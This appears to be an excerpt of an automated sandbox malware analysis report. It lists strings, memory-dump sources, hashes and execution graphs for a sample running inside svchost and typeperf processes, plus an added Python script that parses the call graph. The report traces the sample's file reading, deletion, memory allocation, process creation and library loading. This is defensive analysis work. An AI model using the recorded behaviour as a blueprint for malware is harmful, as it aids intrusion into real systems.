                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03CA4655
                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03CA46FC
                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03CA4725
                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03CA4742
                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03CA4787
                                                                                                                  • ExecuteOptions, xrefs: 03CA46A0
                                                                                                                  • Execute=1, xrefs: 03CA4713
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                  • API String ID: 0-484625025
                                                                                                                  • Opcode ID: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                                                                                                  • Instruction ID: 06b9f57d481f30b6d1324014d8eb9986d75efd06abc0d947a6222a4263b94bae
                                                                                                                  • Opcode Fuzzy Hash: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                                                                                                  • Instruction Fuzzy Hash: E8511735A003196ADB25EBA9DCC5FAE73B8AF04308F0804A9D505EF281E770EA419B50
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __aulldvrm
                                                                                                                  • String ID: +$-$0$0
                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                  • Instruction ID: 34d7a80f866803ea96099025eacc2307bae200f9dd0d7ef8311687fdf6967e29
                                                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                  • Instruction Fuzzy Hash: 7D81AF74E452499EDF28CE69C8917FEBBB5AF45350F1C425AEC61EB390C7349E408B60
                                                                                                                  Strings
                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03CA02BD
                                                                                                                  • RTL: Re-Waiting, xrefs: 03CA031E
                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03CA02E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                  • API String ID: 0-2474120054
                                                                                                                  • Opcode ID: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                                                                                                  • Instruction ID: b48dd6e33cae6828f470beb5e4377074818ba2f757c513872737d7287a0a4653
                                                                                                                  • Opcode Fuzzy Hash: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                                                                                                  • Instruction Fuzzy Hash: 5BE1B031604B42DFD728CF28C884B6AB7E0BB85358F180A5DF9A5CB2D1D775E984CB46
                                                                                                                  Strings
                                                                                                                  • RTL: Re-Waiting, xrefs: 03CA7BAC
                                                                                                                  • RTL: Resource at %p, xrefs: 03CA7B8E
                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03CA7B7F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                  • API String ID: 0-871070163
                                                                                                                  • Opcode ID: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                                                                                                  • Instruction ID: ec8330e975c7650e24055be146c3fcb55e893f51878979c81df99d1cc1424b3e
                                                                                                                  • Opcode Fuzzy Hash: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                                                                                                  • Instruction Fuzzy Hash: 2341E5397047029FC724DE6ADC80B6AB7E9FF84710F140A2DE956DF690DB30E9058B92
                                                                                                                  APIs
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03CA728C
                                                                                                                  Strings
                                                                                                                  • RTL: Re-Waiting, xrefs: 03CA72C1
                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03CA7294
                                                                                                                  • RTL: Resource at %p, xrefs: 03CA72A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                  • Opcode ID: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                                                                                                  • Instruction ID: d9f05128909cebfc15da59a1f08ae3aaf03a5f25a2ffc3fd96c899188efcd288
                                                                                                                  • Opcode Fuzzy Hash: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                                                                                                  • Instruction Fuzzy Hash: 3641EE35600B06ABC720DE6ACC81B6AB7A5FB84718F144629F895EB240DB21F9529BD1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __aulldvrm
                                                                                                                  • String ID: +$-
                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                  • Instruction ID: 496ba0ddffc164ef3be77e7d9607d1638b2546ec5716a4f03d6fcad8134fbe6e
                                                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                  • Instruction Fuzzy Hash: D491A170E0021E9FDF24DE69CD85ABEB7A5EF44360F18851AEC65EB2C0D7309A418B60
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $$@
                                                                                                                  • API String ID: 0-1194432280
                                                                                                                  • Opcode ID: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                                                                                                  • Instruction ID: 6f1e881fbeb022f4a0fa1fbfcd48d6c0d75139eebf8b1b87225491d8be405923
                                                                                                                  • Opcode Fuzzy Hash: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                                                                                                  • Instruction Fuzzy Hash: 51812B76D002699BDB31DF54CC48BEEB7B8AB08710F0545DAA919FB280D7709E84DFA0

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                  Signature Coverage:2.2%
                                                                                                                  Total number of Nodes:455
                                                                                                                  Total number of Limit Nodes:72
                                                                                                                  execution_graph 81663 5c265a 81666 5c6190 81663->81666 81665 5c2693 81667 5c61c3 81666->81667 81668 5c61e7 81667->81668 81673 5d8db0 81667->81673 81668->81665 81670 5c620a 81670->81668 81677 5d9250 81670->81677 81672 5c628a 81672->81665 81674 5d8dcd 81673->81674 81680 3172ca0 LdrInitializeThunk 81674->81680 81675 5d8df9 81675->81670 81678 5d926d 81677->81678 81679 5d927e NtClose 81678->81679 81679->81672 81680->81675 81681 3172ad0 LdrInitializeThunk 81682 5b9a50 81685 5b9e4e 81682->81685 81684 5ba2b0 81685->81684 81686 5daf80 81685->81686 81687 5dafa6 81686->81687 81692 5b4050 81687->81692 81689 5dafb2 81690 5dafeb 81689->81690 81695 5d54e0 81689->81695 81690->81684 81699 5c30e0 81692->81699 81694 5b405d 81694->81689 81696 5d5541 81695->81696 81698 5d554e 81696->81698 81723 5c18e0 81696->81723 81698->81690 81700 5c30fd 81699->81700 81702 5c3116 81700->81702 81703 5d9ca0 81700->81703 81702->81694 81705 5d9cba 81703->81705 81704 5d9ce9 81704->81702 81705->81704 81710 5d88a0 81705->81710 81711 5d88bd 81710->81711 81717 3172c0a 81711->81717 81712 5d88e9 81714 5db320 81712->81714 81720 5d95b0 81714->81720 81716 5d9d62 81716->81702 81718 3172c1f LdrInitializeThunk 81717->81718 81719 3172c11 81717->81719 81718->81712 81719->81712 81721 5d95cd 81720->81721 81722 5d95de RtlFreeHeap 81721->81722 81722->81716 81724 5c191b 81723->81724 81739 5c7d70 81724->81739 81726 5c1923 81738 5c1bf7 81726->81738 81750 5db400 81726->81750 81728 5c1939 81729 5db400 RtlAllocateHeap 81728->81729 81730 5c194a 81729->81730 81731 5db400 RtlAllocateHeap 81730->81731 81733 5c195b 81731->81733 81732 5c19fb 81753 5c4430 81732->81753 81733->81732 81762 5c68f0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81733->81762 81736 5c1bb2 81758 5d7e20 81736->81758 81738->81698 81740 5c7d9c 81739->81740 81763 5c7c60 81740->81763 81743 5c7dc9 81746 5d9250 NtClose 81743->81746 81748 
5c7dd4 81743->81748 81744 5c7de1 81745 5c7dfd 81744->81745 81747 5d9250 NtClose 81744->81747 81745->81726 81746->81748 81749 5c7df3 81747->81749 81748->81726 81749->81726 81774 5d9560 81750->81774 81752 5db41b 81752->81728 81756 5c4454 81753->81756 81754 5c445b 81754->81736 81755 5c44a7 81755->81736 81756->81754 81756->81755 81757 5c44a0 LdrLoadDll 81756->81757 81757->81755 81759 5d7e81 81758->81759 81761 5d7e8e 81759->81761 81777 5c1c10 81759->81777 81761->81738 81762->81732 81764 5c7c7a 81763->81764 81768 5c7d56 81763->81768 81769 5d8940 81764->81769 81767 5d9250 NtClose 81767->81768 81768->81743 81768->81744 81770 5d895d 81769->81770 81773 31735c0 LdrInitializeThunk 81770->81773 81771 5c7d4a 81771->81767 81773->81771 81775 5d957a 81774->81775 81776 5d958b RtlAllocateHeap 81775->81776 81776->81752 81793 5c8040 81777->81793 81779 5c2180 81779->81761 81780 5c1c30 81780->81779 81797 5d0ff0 81780->81797 81783 5c1e45 81805 5dc610 81783->81805 81784 5c1c8b 81784->81779 81800 5dc4e0 81784->81800 81787 5c1e5a 81789 5c1ea7 81787->81789 81811 5c0730 81787->81811 81789->81779 81791 5c0730 LdrInitializeThunk 81789->81791 81815 5c7fe0 81789->81815 81790 5c7fe0 LdrInitializeThunk 81792 5c1ff8 81790->81792 81791->81789 81792->81789 81792->81790 81794 5c804d 81793->81794 81795 5c806b SetErrorMode 81794->81795 81796 5c8072 81794->81796 81795->81796 81796->81780 81819 5db290 81797->81819 81799 5d1011 81799->81784 81801 5dc4f6 81800->81801 81802 5dc4f0 81800->81802 81803 5db400 RtlAllocateHeap 81801->81803 81802->81783 81804 5dc51c 81803->81804 81804->81783 81806 5dc580 81805->81806 81807 5dc5dd 81806->81807 81808 5db400 RtlAllocateHeap 81806->81808 81807->81787 81809 5dc5ba 81808->81809 81810 5db320 RtlFreeHeap 81809->81810 81810->81807 81812 5c0746 81811->81812 81826 5d94d0 81812->81826 81816 5c7ff3 81815->81816 81831 5d87a0 81816->81831 81818 5c801e 81818->81789 81822 5d93b0 81819->81822 81821 5db2c1 81821->81799 81823 5d9445 81822->81823 81825 5d93db 81822->81825 81824 5d945b 
NtAllocateVirtualMemory 81823->81824 81824->81821 81825->81821 81827 5d94ea 81826->81827 81830 3172c70 LdrInitializeThunk 81827->81830 81828 5c0752 81828->81792 81830->81828 81832 5d8821 81831->81832 81834 5d87ce 81831->81834 81836 3172dd0 LdrInitializeThunk 81832->81836 81833 5d8846 81833->81818 81834->81818 81836->81833 81837 5cc4d0 81838 5cc4f9 81837->81838 81839 5cc5fc 81838->81839 81840 5cc59e FindFirstFileW 81838->81840 81840->81839 81842 5cc5b9 81840->81842 81841 5cc5e3 FindNextFileW 81841->81842 81843 5cc5f5 FindClose 81841->81843 81842->81841 81843->81839 81844 5c5a90 81845 5c7fe0 LdrInitializeThunk 81844->81845 81846 5c5ac0 81845->81846 81849 5c7f60 81846->81849 81848 5c5ae5 81851 5c7f93 81849->81851 81850 5c7fc5 81850->81848 81851->81850 81856 5d8570 81851->81856 81853 5c7fb5 81854 5c7fd1 81853->81854 81855 5d9250 NtClose 81853->81855 81854->81848 81855->81850 81857 5d85f0 81856->81857 81859 5d859e 81856->81859 81861 3174650 LdrInitializeThunk 81857->81861 81858 5d8615 81858->81853 81859->81853 81861->81858 81862 5d8850 81863 5d886a 81862->81863 81866 3172df0 LdrInitializeThunk 81863->81866 81864 5d8892 81866->81864 81867 5d86d0 81868 5d875f 81867->81868 81870 5d86fb 81867->81870 81872 3172ee0 LdrInitializeThunk 81868->81872 81869 5d8790 81872->81869 81873 5d8f50 81874 5d900a 81873->81874 81876 5d8f82 81873->81876 81875 5d9020 NtCreateFile 81874->81875 81877 5d5f50 81878 5d5faa 81877->81878 81880 5d5fb7 81878->81880 81881 5d3970 81878->81881 81882 5d3978 81881->81882 81883 5db290 NtAllocateVirtualMemory 81882->81883 81885 5d39b1 81883->81885 81884 5d3ab0 81884->81880 81885->81884 81886 5c4430 LdrLoadDll 81885->81886 81888 5d39f7 81886->81888 81887 5d3a32 Sleep 81887->81888 81888->81884 81888->81887 81889 5c2209 81890 5c2219 81889->81890 81891 5c21b6 81889->81891 81892 5d88a0 LdrInitializeThunk 81891->81892 81893 5c21c6 81892->81893 81896 5d92e0 81893->81896 81895 5c21db 81897 5d9372 81896->81897 81898 5d930e 81896->81898 81901 3172e80 LdrInitializeThunk 
81897->81901 81898->81895 81899 5d93a3 81899->81895 81901->81899 81902 5bb440 81903 5db290 NtAllocateVirtualMemory 81902->81903 81904 5bcab1 81903->81904 81905 5d56c0 81906 5d5722 81905->81906 81907 5d572f 81906->81907 81909 5c7290 81906->81909 81910 5c7261 81909->81910 81912 5c727e 81909->81912 81910->81912 81913 5cb160 81910->81913 81912->81907 81915 5cb186 81913->81915 81914 5cb3a0 81914->81912 81915->81914 81940 5d9640 81915->81940 81917 5cb1f9 81917->81914 81918 5dc610 2 API calls 81917->81918 81919 5cb218 81918->81919 81919->81914 81920 5cb2e4 81919->81920 81921 5d88a0 LdrInitializeThunk 81919->81921 81923 5c5a10 LdrInitializeThunk 81920->81923 81924 5cb2ff 81920->81924 81922 5cb27a 81921->81922 81922->81920 81927 5cb283 81922->81927 81923->81924 81928 5cb388 81924->81928 81946 5d8410 81924->81946 81925 5cb2cc 81929 5c7fe0 LdrInitializeThunk 81925->81929 81926 5cb2b1 81961 5d4670 LdrInitializeThunk 81926->81961 81927->81914 81927->81925 81927->81926 81943 5c5a10 81927->81943 81930 5c7fe0 LdrInitializeThunk 81928->81930 81934 5cb2da 81929->81934 81935 5cb396 81930->81935 81934->81912 81935->81912 81936 5cb35f 81951 5d84c0 81936->81951 81938 5cb379 81956 5d8620 81938->81956 81941 5d965a 81940->81941 81942 5d966b CreateProcessInternalW 81941->81942 81942->81917 81962 5d8a70 81943->81962 81945 5c5a4b 81945->81926 81947 5d848d 81946->81947 81948 5d843b 81946->81948 81968 31739b0 LdrInitializeThunk 81947->81968 81948->81936 81949 5d84b2 81949->81936 81952 5d8540 81951->81952 81953 5d84ee 81951->81953 81969 3174340 LdrInitializeThunk 81952->81969 81953->81938 81954 5d8565 81954->81938 81957 5d864b 81956->81957 81958 5d869d 81956->81958 81957->81928 81970 3172fb0 LdrInitializeThunk 81958->81970 81959 5d86c2 81959->81928 81961->81925 81963 5d8b21 81962->81963 81965 5d8a9f 81962->81965 81967 3172d10 LdrInitializeThunk 81963->81967 81964 5d8b66 81964->81945 81965->81945 81967->81964 81968->81949 81969->81954 81970->81959 81971 5dc540 81972 5db320 RtlFreeHeap 
Execution graph for the 005B0000 dump (rendered image not preserved). The edges into 5dc555 at the top of this excerpt are the tail of a graph whose entry lies before this section. Entry routines that start here, with the API calls their call trees reach as recovered from the graph's node labels:
5d1939: NtClose
5c86f7: LdrInitializeThunk
5b99f0: CreateThread
5cac30: RtlAllocateHeap, RtlFreeHeap, GetFileAttributesW, LdrLoadDll
5c7030: NtClose, LdrInitializeThunk
5cf6f0: NtClose, RtlAllocateHeap, RtlFreeHeap, LdrLoadDll, CoInitialize, CoUninitialize, LdrInitializeThunk (via 3172ba0 and 3172c60 in the 03100000 image), plus an unlabelled "2 API calls" node at 5c6190
5cfff0: LdrLoadDll
5d11b1: NtReadFile, NtClose, RtlFreeHeap
5d19b0: RtlFreeHeap
5d91b0: NtDeleteFile
5c9af3: RtlFreeHeap
5c6c60: LdrInitializeThunk (via 5d8a70 and 3172f30)
5c0ca0: LdrLoadDll, PostThreadMessageW
5d1620: NtClose, RtlAllocateHeap
5c2fe3: NtClose, plus an unlabelled "2 API calls" node at 5c7c60
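The execution graph above is exported by the report as a flattened node/edge list: each node is a numeric id, an address (or an address range in a basic-block graph) and an optional label naming the API reached at that node, and each `A->B` token is an edge. The following Python is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses that export, finds the entry nodes (those with no incoming edge) and lists which APIs each entry's call tree reaches, which is a quick way to pick out the routines of the 005B0000 dump that go straight to ntdll natives such as NtReadFile or NtDeleteFile. The embedded sample is a constructed excerpt of the graphs on this page; the tokenising rules (a decimal id followed by a hex address opens a node, labels never follow an edge, summary nodes such as "2 API calls" carry no API name) and the Nt/Zw/Ldr prefix list are assumptions inferred from the dump, not a documented format.

```python
import re
from collections import defaultdict

# Token shapes in the graph export (assumed from the dump on this page).
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                    # "82151->82152"
LOC_RE = re.compile(r"^[0-9a-f]{5,8}(?:-[0-9a-f]{5,8})?$")  # "5d917d" or "5b9a50-5b9e4c"
API_RE = re.compile(r"^[A-Z][a-z]+[A-Za-z0-9]*$")           # "NtReadFile", but not "API" or "calls"

# Constructed excerpt of the page's export: four call graphs plus the opening
# of the basic-block graph.  Not a complete copy of the report.
SAMPLE = """
81974 5d1939 81975 5d193f 81974->81975 81976 5d9250 NtClose 81975->81976 81978 5d1944 81975->81978 81977 5d1969 81976->81977
81985 5b99f0 81986 5b99ff 81985->81986 81987 5b9a3d 81986->81987 81988 5b9a2a CreateThread 81986->81988
82137 5d11b1 82138 5d11bd 82137->82138 82150 5d90c0 82138->82150 82144 5d11d2 82151 5d9167 82150->82151 82153 5d90eb 82150->82153 82152 5d917d NtReadFile 82151->82152 82152->82144 82153->82144
82078 5cf6f0 82079 5cf754 82078->82079 82080 5c6190 2 API calls 82079->82080
control_flow_graph 29 5b9a50-5b9e4c 30 5b9e5d-5b9e64 29->30 64 5ba28a-5ba293 30->64 71 5ba2ab call 5daf80 64->71
"""


def parse_graph(text):
    """Parse the flattened export into nodes {id: (location, label_tokens)}
    and a list of (src, dst) edges.  A decimal id followed by a hex address
    opens a node; following plain tokens are that node's label; an 'A->B'
    token is an edge and closes any open label.  Stray words before the
    first node (e.g. the 'control_flow_graph' title) are dropped."""
    tokens = text.split()
    nodes, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            current = None
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok.isdigit() and LOC_RE.match(nxt):
            current = int(tok)
            nodes[current] = (nxt, [])
            i += 2
            continue
        if current is not None:
            nodes[current][1].append(tok)  # label word such as "NtClose"
        i += 1
    return nodes, edges


def node_apis(nodes):
    """API names on each node's label; '2 API calls' summary nodes yield none."""
    return {nid: {t for t in label if API_RE.match(t)} for nid, (_, label) in nodes.items()}


def reachable_apis(nodes, edges):
    """For each entry node (no incoming edge) return
    {location: sorted APIs reachable along the graph's edges}."""
    succ = defaultdict(list)
    has_pred = set()
    for src, dst in edges:
        succ[src].append(dst)
        has_pred.add(dst)
    apis = node_apis(nodes)
    result = {}
    for entry, (loc, _) in nodes.items():
        if entry in has_pred:
            continue
        seen, stack, found = set(), [entry], set()
        while stack:                      # iterative DFS; graphs may contain cycles
            nid = stack.pop()
            if nid in seen:
                continue
            seen.add(nid)
            found |= apis.get(nid, set())
            stack.extend(succ.get(nid, ()))
        result[loc] = sorted(found)
    return result


def native_entrypoints(reach, prefixes=("Nt", "Zw", "Ldr")):
    """Entries whose call tree reaches ntdll-level natives (the layer below
    the Win32 API); the prefix list is an assumption, extend it as needed."""
    out = {}
    for loc, calls in reach.items():
        natives = [a for a in calls if a.startswith(prefixes)]
        if natives:
            out[loc] = natives
    return out


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    reach = reachable_apis(nodes, edges)
    for loc, calls in reach.items():
        print(f"{loc}: {', '.join(calls) or '(no API reached)'}")
    print("reach ntdll natives:", native_entrypoints(reach))
```

Run it against one graph at a time in practice: node ids are only unique within a single exported graph, and the basic-block graph reuses small ids.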

                                                                                                                   Control-flow Graph (rendered image not preserved; legend: Executed / Not Executed)
                                                                                                                   Basic-block graph of the function at 5b9a50: blocks span 5b9a50-5b9e4c through 5ba34d-5ba356 and include several self-looping blocks (for example 5b9f5d-5b9f76 and 5ba2b0-5ba2c9); the only call edge leaves block 5ba2ab for 5daf80.
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 7$.$/h$1$5^$5j$8$>$C3$R*$S$T$Ud$X$Yo$Z$\$_$`$d$e$j$loT$m$n$o@$oT$z$~$~
                                                                                                                  • API String ID: 0-2547687494
                                                                                                                  • Opcode ID: 5a73e224aa1e59a6b3cf36b0272761b8324c15898c1bb3030953faf41b8d5e14
                                                                                                                  • Instruction ID: d11f0187bd246f0847118d010564625fe3f3bf10f58f9839e6c5e284bc36b5d2
                                                                                                                  • Opcode Fuzzy Hash: 5a73e224aa1e59a6b3cf36b0272761b8324c15898c1bb3030953faf41b8d5e14
                                                                                                                  • Instruction Fuzzy Hash: 95329FB0D05229CBEB24CF44C9987DDBBB2BB85308F1085D9D5096B281D7B66EC8DF52
                                                                                                                  APIs
                                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 005D91A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 9d26a81417d4aad86a3bdfe432021ce06a5a1413c2db1edcf2b061ba22de14fe
                                                                                                                  • Instruction ID: 5e2fcd348419af09eb29d3ab2c432dd0ce616e0b4e72f3c0098229522538ce03
                                                                                                                  • Opcode Fuzzy Hash: 9d26a81417d4aad86a3bdfe432021ce06a5a1413c2db1edcf2b061ba22de14fe
                                                                                                                  • Instruction Fuzzy Hash: 1A31F8B5A00249AFDB14DF98C841EEFB7F9EF88304F10860AF918A7340D770A911CBA5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_5b0000_typeperf.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4033686569-0
                                                                                                                  • Opcode ID: cae9c8f9a44f0116e701cd32b277d65933e45854969e26b53d9c359ffda555fc
                                                                                                                  • Instruction ID: b60f09b4d0564e4b8521792a6d5719248e1a5bb52ba56ffe61a73937ee56a111
                                                                                                                  • Opcode Fuzzy Hash: cae9c8f9a44f0116e701cd32b277d65933e45854969e26b53d9c359ffda555fc
                                                                                                                  • Instruction Fuzzy Hash: 84119171600605BED620EB68CC45FEFB7ACEFC9314F50450AF91897281D77179118BA5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 24ad42fb7355fbb98f21aa88fda3809380a07b8cfb5f4cd7c62030472c2583fe
                                                                                                                  • Instruction ID: 2843a2f206b27ee3288c610a871e3ae6f62c86d57654307c3ff70ba79b69b774
                                                                                                                  • Opcode Fuzzy Hash: 24ad42fb7355fbb98f21aa88fda3809380a07b8cfb5f4cd7c62030472c2583fe
                                                                                                                  • Instruction Fuzzy Hash: 19900231605804139140B25849C4586400697E4301B95D011E0425558C8B148A565765
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000322D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_3100000_typeperf.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 3f8723c5a79379a9e0c94251ab81fbea86305558b3bb20d22917614ca033253d
                                                                                                                  • Instruction ID: a814c513ebc8e15b660df8954e35f3bf8aa118457bdd202da19852d7fdaf781d
                                                                                                                  • Opcode Fuzzy Hash: 3f8723c5a79379a9e0c94251ab81fbea86305558b3bb20d22917614ca033253d
                                                                                                                  • Instruction Fuzzy Hash: A8900471701504434140F35C4D444477007D7F53013D5D115F0555574CC71CCD55D77D
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.3738573348.0000000003229000.00000040.00001000.00020000.00000000.sdmp
